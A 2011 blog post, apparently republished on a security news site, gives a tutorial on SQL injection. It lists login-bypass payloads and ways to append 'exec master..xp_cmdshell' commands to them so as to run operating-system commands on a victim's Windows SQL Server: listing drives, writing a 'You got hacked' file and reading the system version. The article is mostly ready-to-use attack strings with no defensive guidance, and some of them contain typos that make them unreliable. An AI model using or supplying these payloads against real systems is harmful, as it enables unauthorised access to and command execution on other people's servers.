Follow us on Twitter
  1. wp_alltrending Fake iPhone #iphone #hacking #wpool http://t.co/DfQHE8d7 3 minutes
  2. CaffSec #SITREP Chicago city, police websites possibly hacked http://t.co/EIRecuT4 #hacking #security 4 minutes
  3. CaffSec #SITREP NATO Summit: Hackers Target Police, City of Chicago Websites http://t.co/rd6av6bI #hacking #security 4 minutes
  4. CaffSec #SITREP Murdoch hacking scandal piles pressure on UK government http://t.co/B5SctXxX #hacking #security 4 minutes
  5. CaffSec #SITREP Accounts on 'Diablo 3' hacked http://t.co/GoLarZWD #hacking #security 4 minutes
  6. CaffSec #SITREP Indian hackers deface Multan government website http://t.co/i6ZzZ8Jk #hacking #security 4 minutes
  7. binushacker #Hacker #Hacking The Story Behind Payment Disruptor http://t.co/Lh0D57JG And Its Founder Patrick http://t.co/c6oaY1vZ #Technology #News 8 minutes
Most popular
Login

SQL Injection Just A Little Beyond Injection

PostDateIconSunday, 19 June 2011 21:20 | PostAuthorIconWritten by Nrupen Masram | E-mail
User Rating: / 5
PoorBest 

If you have been a regular reader of my blog then you might remember following type of SQL queries,

1 ' OR ' 1 ' = ' 1
a ' OR ' 1 ' = ' 1
a ' OR ' a ' = ' a
Login: 1 ' OR ' 1 ' = ' 1
Password : 1 ' OR ' 1 ' = ' 1
http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1

and similar variants they all are usually used to bypass login page. By the while discussing SQL injection several times I mentioned that SQL injection is kinda command injection attack. You might wonder a little if SQL injection is kinda command injection attack then how I can execute commands using it. Iintentionally left command injection part in SQL injection to cover it while discussing command injection.

First of all command injection using SQL injection works only on windows based shell means it will not work on Linux. Now how it works, as we know that SQL injection is not only a command injection it is also a code injection attack because each statement in SQL injection is interpreted code which terminates with ' ; ' (semicolon) which acts as statement terminator. While SQL injection you intentionally never use statement terminator because you already know web application does it automatically. While injecting commands a hacker can exploit this to execute commands using SQL injection by terminating statement and appending following command.
exec master..xp_cmdshell “” --

If victim is vulnerable to command injection attack via SQL injection then any SQL query you can inject will 100% support above appended code, have a look on following examples,

1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “dir c:\” –
1 ' ; exec master..xp_cmdshell “dir c:\” –

Above commands will list all folders and files in C drive of vicim,

a ' OR ' 1 ' = ' 1 ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –
a ' ; exec master..xp_cmdshell “echo You got hacked>file.txt ” –

Above statement will add a file in system with message You Got Hacked.

a ' OR ' a ' = ' a '; exec master..xp_cmdshell..xp “ping 127.0.0.1” -- Login:
1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell..xp “ping 127.0.0.1” --

Above statement will ping victim system.

Password : 1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “ver” –

Above statement will display name and version of victim system. And there should be no surprise because even this works,

http://victim/index.asp?id=1 ' OR ' 1 ' = ' 1 ' ; exec master..xp_cmdshell “mkdir hacker” -

Source: nrupentheking.blogspot.com


Voeg deze pagina toe aan uw favoriete Social Bookmarking websites
Reddit! Del.icio.us! Mixx! Free and Open Source Software News Google! Live! Facebook! StumbleUpon! nujij msnrep ekudos TwitThis Joomla Free PHP
< Prev   Next >

Last Updated (Tuesday, 21 June 2011 06:59)

 

Comments  

 
+1 #1 Dave 2011-06-21 07:04
Maar hoe voorkom je het nu?
http://www.texaswebdevelopers.com/blog/template_permalink.asp?id=107
Quote
 

Add comment


Security code
Refresh

Aanverwante artikelen

Best Rated Content
Archive
Last comments
feed-image

Copyright 2008-2012.
All Rights Reserved.